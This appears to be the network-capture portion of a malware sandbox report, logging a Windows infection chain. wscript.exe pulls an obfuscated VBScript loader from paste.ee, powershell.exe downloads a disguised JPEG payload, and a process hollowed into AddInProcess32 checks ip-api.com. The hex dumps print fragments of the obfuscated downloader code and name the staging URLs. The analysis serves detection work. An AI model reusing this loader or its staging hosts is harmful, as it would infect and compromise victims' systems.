2	192.168.2.8	54305	208.95.112.1	80	8168	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 15:15:26.255616903 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 14, 2024 15:15:26.848088980 CEST	174	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:25 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	188.114.97.3	443	7592	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:01 UTC	319	OUT	GET /d/3dasY HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-06-14 13:15:01 UTC	1242	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:01 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byD78xwm9MNOGzgPY3W07%2FqRYRLc%2FmuvoCjTe800a2HO%2BQbqzEYfk94zYd6Xdvzb%2FXrSFwgTY6U2cEaIkymeoKxx5fnOEyLMDEnSF%2BlMk9q%2BjbSwbUX2CL4%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a96341a553ab9-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:01 UTC	127	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 6f 73 74 65 72 69 64 61 64 65 20 2c 20 73 75 62 66 61 63 65 20 2c 20 62 65 72 6c 69 6e 65 6e 73 65 20 2c 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 2c 20 64 69 6f 6e 69 6e 61 20 2c 20 43 61 6d 61 20 2c 20 64 69 6f 6e 69 6e 61 31 0d 0a 20 20 20 20 20 73 75 62 66 61 63 65 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 62 65 72 6c 69 6e Data Ascii: 1f7f dim posteridade , subface , berlinense , malhorquino , dionina , Cama , dionina1 subface = " " berlin
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 65 6e 73 65 20 20 3d 20 22 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 Data Ascii: ense = "" & malhorquino & subface & malhorquino & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTr
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f Data Ascii: DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & malhorquino & subface & malhorquino
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 Data Ascii: gTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & malhorquino & subface & malhorquino & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & malhorquino &
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 67 54 72 65 58 77 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 67 44 67 54 72 65 4d 67 44 67 54 72 65 34 44 67 54 72 65 44 51 44 67 54 72 65 4d 51 44 67 54 72 65 7a 44 67 54 72 65 44 67 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 Data Ascii: gTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & malhorquino & subface & malhorquino & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & malhorquino &
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 72 71 75 69 6e 6f 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 Data Ascii: rquino & "QBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre"
2024-06-14 13:15:01 UTC	1099	IN	Data Raw: 6b 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 Data Ascii: kDgTre" & malhorquino & subface & malhorquino & "gDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & malhorquino & subface & malhorquino & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & malhorqui
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 31 36 34 63 0d 0a 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 Data Ascii: 164cgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & malhorquino & subface & malhorquino & "DgTreBJDgTreG4DgTre" & malhorquino & subface & malhorquino & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" &
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 Data Ascii: gTre" & malhorquino & subface & malhorquino & "DgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre" & malhorquino & subface & malhorquino & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTr
2024-06-14 13:15:01 UTC	1369	IN	Data Raw: 44 67 54 72 65 57 77 42 64 44 67 54 72 65 46 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6f 44 67 54 72 65 43 63 44 67 54 72 65 64 44 67 54 72 65 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c 67 42 6b 44 67 54 72 65 48 49 44 67 54 72 65 62 77 42 33 44 67 54 72 65 48 4d 44 67 54 72 65 4c 77 44 67 54 72 65 78 44 67 54 72 65 44 63 44 67 54 72 65 4c 67 44 67 54 72 65 35 44 67 54 72 65 44 4d 44 67 54 72 65 4c 67 44 67 54 72 65 7a 44 67 54 72 65 44 49 44 67 54 72 65 4d 51 44 67 54 72 65 75 44 67 54 72 65 44 4d 44 67 54 72 65 4f 51 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 4f 67 42 77 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 6f 44 67 54 72 65 43 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 73 44 67 54 72 65 43 44 67 54 72 Data Ascii: DgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	188.114.97.3	443	7908	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:04 UTC	124	OUT	GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-06-14 13:15:05 UTC	685	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:05 GMT Content-Type: image/jpeg Content-Length: 3043973 Connection: close Last-Modified: Thu, 13 Jun 2024 13:08:58 GMT ETag: "666aef6a-2e7285" Cache-Control: max-age=2678400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPFTyp74G038karuzp7b3YXZ91yPNOsAr8ho5OO5edWw%2BUzg9xBbwTewcThhSigXGoQzZZkNmglCNLShjf6T6i3h7V2VZ92lbVx1xwL82bGsiMZrAXe0Fgr4%2BpCjUHECOXphEtt%2Bkvq7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a964a1a3d6c56-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:05 UTC	684	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 Data Ascii: cJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.J9x
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 41 31 0a Data Ascii: 2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A1
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 Data Ascii: 2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 Data Ascii: cb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 c0 20 fd 78 af Data Ascii: axx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5 x
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5 20 ab 28 Data Ascii: ]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV (
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 